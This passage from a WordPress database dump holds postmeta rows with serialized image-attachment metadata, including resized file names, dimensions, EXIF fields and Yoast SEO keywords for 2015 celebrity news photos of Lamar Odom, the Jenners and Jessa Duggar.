;s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:21:\"LamarOdom-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"LamarOdom-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:23:\"LamarOdom-1068x1335.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:1335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:21:\"LamarOdom-336x420.jpg\";s:5:\"width\";i:336;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"PENTAX K-x\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1334946102\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:16:\"0.00555555555556\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3751,529,'_yoast_wpseo_focuskw_text_input','Lamar Odom'),(3752,529,'_yoast_wpseo_content_score','60'),(3753,529,'_thumbnail_id','646'),(3755,529,'_yoast_wpseo_primary_category',''),(3756,648,'_wp_attached_file','2015/11/krisjenner.jpg'),(3757,648,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:683;s:6:\"height\";i:1024;s:4:\"file\";s:22:\"2015/11/krisjenner.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"krisjenner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"krisjenner-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"krisjenner-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"krisjenner-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"krisjenner-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"krisjenner-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"krisjenner-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"krisjenner-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"krisjenner-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"krisjenner-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"krisjenner-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"krisjenner-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"krisjenner-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"krisjenner-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"krisjenner-683x385.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"krisjenner-683x486.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"krisjenner-683x580.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"krisjenner-280x420.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3758,528,'_yoast_wpseo_focuskw_text_input','Kris Jenner'),(3759,528,'_yoast_wpseo_content_score','30'),(3760,650,'_wp_attached_file','2015/11/krisjenner-1.jpg'),(3761,650,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:313;s:6:\"height\";i:417;s:4:\"file\";s:24:\"2015/11/krisjenner-1.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"krisjenner-1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"krisjenner-1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x160.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x235.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x400.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x220.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x364.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x261.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"krisjenner-1-313x385.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3762,651,'_wp_attached_file','2015/11/KrisJenner.jpg'),(3763,651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2015/11/KrisJenner.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"KrisJenner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"KrisJenner-250x300.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"KrisJenner-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"KrisJenner-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"KrisJenner-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"KrisJenner-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"KrisJenner-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"KrisJenner-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"KrisJenner-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"KrisJenner-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"KrisJenner-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"KrisJenner-500x261.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"KrisJenner-500x462.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"KrisJenner-500x385.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"KrisJenner-500x486.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"KrisJenner-500x580.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"KrisJenner-350x420.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3764,528,'_thumbnail_id','651'),(3766,528,'_yoast_wpseo_primary_category',''),(3767,652,'_wp_attached_file','2015/11/jessaduggar.jpg'),(3768,652,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:601;s:6:\"height\";i:775;s:4:\"file\";s:23:\"2015/11/jessaduggar.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"jessaduggar-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"jessaduggar-233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:21:\"jessaduggar-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"jessaduggar-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"jessaduggar-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"jessaduggar-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"jessaduggar-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"jessaduggar-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"jessaduggar-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"jessaduggar-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"jessaduggar-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"jessaduggar-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:23:\"jessaduggar-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:23:\"jessaduggar-601x385.jpg\";s:5:\"width\";i:601;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:23:\"jessaduggar-601x486.jpg\";s:5:\"width\";i:601;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:23:\"jessaduggar-601x580.jpg\";s:5:\"width\";i:601;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:23:\"jessaduggar-326x420.jpg\";s:5:\"width\";i:326;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1441295435\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3769,527,'_yoast_wpseo_focuskw_text_input','Jessa Duggar'),(3770,527,'_yoast_wpseo_content_score','60'),(3771,527,'_thumbnail_id','652'),(3773,527,'_yoast_wpseo_primary_category',''),(3774,654,'_wp_attached_file','2015/11/KendallJenner.jpg'),(3775,654,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:615;s:6:\"height\";i:923;s:4:\"file\";s:25:\"2015/11/KendallJenner.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"KendallJenner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"KendallJenner-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"KendallJenner-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"KendallJenner-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"KendallJenner-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"KendallJenner-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"KendallJenner-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"KendallJenner-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"KendallJenner-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"KendallJenner-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"KendallJenner-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"KendallJenner-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"KendallJenner-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"KendallJenner-615x385.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"KendallJenner-615x486.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"KendallJenner-615x580.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"KendallJenner-280x420.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3776,526,'_yoast_wpseo_focuskw_text_input','Kendall Jenner'),(3777,526,'_yoast_wpseo_content_score','60'),(3778,656,'_wp_attached_file','2015/11/kendalljenner.jpg'),(3779,656,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:684;s:6:\"height\";i:821;s:4:\"file\";s:25:\"2015/11/kendalljenner.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"kendalljenner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"kendalljenner-250x300.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"kendalljenner-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"kendalljenner-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"kendalljenner-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"kendalljenner-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"kendalljenner-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"kendalljenner-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"kendalljenner-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"kendalljenner-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"kendalljenner-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"kendalljenner-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"kendalljenner-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"kendalljenner-684x385.jpg\";s:5:\"width\";i:684;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"kendalljenner-684x486.jpg\";s:5:\"width\";i:684;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"kendalljenner-684x580.jpg\";s:5:\"width\";i:684;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"kendalljenner-350x420.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:9:\"WireImage\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:222:\"NEW YORK, NY - SEPTEMBER 18: Kendell Jenner celebrates the launch of the new Estee Lauder Fragrance Modern Muse Le Rouge at Macy\'s Herald Square on September 18, 2015 in New York City. (Photo by John Lamparski/WireImage)\";s:17:\"created_timestamp\";s:10:\"1442600356\";s:9:\"copyright\";s:19:\"2015 John Lamparski\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:91:\"Kendell Jenner Celebrates The Launch Of The New Estee Lauder Fragrance Modern Muse Le Rouge\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3780,657,'_wp_attached_file','2015/11/kendalljenner-1.jpg'),(3781,657,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:620;s:6:\"height\";i:413;s:4:\"file\";s:27:\"2015/11/kendalljenner-1.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"kendalljenner-1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"kendalljenner-1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"kendalljenner-1-533x261